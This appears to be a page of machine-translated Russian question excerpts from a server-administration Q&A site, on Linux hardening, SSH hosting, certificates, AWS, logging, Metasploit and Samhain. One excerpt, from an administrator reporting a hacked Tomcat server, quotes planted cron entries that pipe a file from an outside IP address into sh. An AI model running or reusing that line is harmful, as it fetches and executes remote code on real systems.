Я видел упоминание о безопасности / dev / shm и / proc, и мне было интересно, как вы это делаете и из чего состоит? Я предполагаю, что это включает в себя /etc/sysctl.conf редактирование некоторого вида права. Как это? kernel.exec-shield = 1 kernel.randomize_va_space = 1...
Подумайте о компании веб-хостинга, которая хочет позволить пользователям управлять файлами и репозиториями git через ssh. Это включает в себя: защищенная копия (scp) создание, копирование, перемещение / переименование и удаление файлов выполнение небольшого набора команд для управления исходным...
У нас уже есть сертификат подстановочного знака для *.mycompany.com. В нашей сети есть хосты, которые доступны только внутри. Все они принадлежат internal.mycompany.comподдомену. Существует частный сервер с именем хоста, server.internal.mycompany.comна котором я развернул наш подстановочный...
Срок действия моей бесплатной учетной записи AWS истек. Я удалил все ресурсы S3 и EC2, но я забочусь, если смогу покинуть Key Pairsи Security Groupsне платить за них. (Ресурсы моей учетной записи теперь выглядят так: Ресурсы ) Документация Amazon, похоже, не упоминает эту проблему. Эти ресурсы...
У меня есть выделенный сервер Debian. Я пытаюсь обезопасить его, и я подумал, что было бы неплохо закрыть сервисы, которые мне не нужны, например, FTP. Я предлагаю запустить что-то вроде этого при развертывании: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f vsftpd...
Предыстория : удаленное объединение журналов рассматривается как способ повышения безопасности. Как правило, это устраняет риск того, что злоумышленник, взломавший систему, сможет редактировать или удалять журналы, чтобы сорвать судебный анализ. Я изучал параметры безопасности в общих инструментах...
Этот вопрос относится к ветке @ SwiftOnSecurity в Twitter: https://twitter.com/SwiftOnSecurity/status/655208224572882944. Прочитав ветку, я все еще не совсем понимаю, почему вы хотите отключить сетевой вход в систему для локальных учетных записей. Так вот что я думаю, пожалуйста, поправьте меня,...
Свежий метасплоит на kalilinux 2016 (последняя стабильная версия) systemctl start postgresql OK На msfconsole msf > db_status [*] postgresql connected to msf Когда я запускаю поиск msf > search samba [!] Module database cache not built yet, using slow search Поэтому я перестраиваю кеш ... msf...
Я только что установил MariaDbна свежий Ubuntu Gnome и впоследствии запустил mysql_secure_installation, где я установил приличный пароль администратора, удалил анонимного пользователя и т. Д. После этого я понял странное поведение в отношении пароля администратора: Если я пытаюсь войти с моей...
Закрыто. Этот вопрос не по теме . В настоящее время он не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он соответствовал теме отказа сервера. Закрыто 3 года назад . Какой самый простой способ получить уведомление, когда определенные события появляются в журналах Windows -...
Во время запуска проекта войны на сервере Apache Tomcat я обнаружил, что сервер был взломан. Пока бежит война, неизвестный cronбежит вот так [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh...
У меня около 200 пользователей. 50 в Азии, 50 в южной и восточной Европе и около 100 в Западной Европе. Я хотел бы указать 50 пользователей, которые находятся в Азии, на наш DC в Азии, и в настоящее время кажется, что они проходят аутентификацию на наших европейских серверах, что вызывает огромную...
Я хотел бы Самайн контролировать файл, скажем , к примеру, /root/somefile. Этот файл в настоящее время не существует, но я хотел бы получить уведомление, если он будет создан в любой момент. Я добавляю это к samhainrc: [ReadOnly] file = /root/somefile Это заставляет Samhain выдавать следующие...
В настоящее время я работаю над тем, чтобы защитить свои серверы от взлома - среди прочего, я получаю множество попыток войти в систему как root по ssh. Хотя я реализовал fail2ban, мне интересно, почему по умолчанию вход в систему root разрешен для запуска? Даже с дистрибутивами, не основанными на...
Я планирую арендовать выделенный сервер для размещения коммерческого приложения, которое должно содержать все необходимое для работы на одном компьютере (внешний интерфейс, серверная часть, базы данных, аналитика, системы резервного копирования и т. Д.). Это действительно упрощенная инфраструктура,...
У нас есть сервер, и мы используем его как общий сервер для наших клиентов. Большинство клиентов используют Wordpress, и для него установлена классическая среда LAMP. Мы предоставляем SFTP-доступ каждому клиенту (конечно, с привязанными пользователями). Обычно клиенты изолированы друг от друга...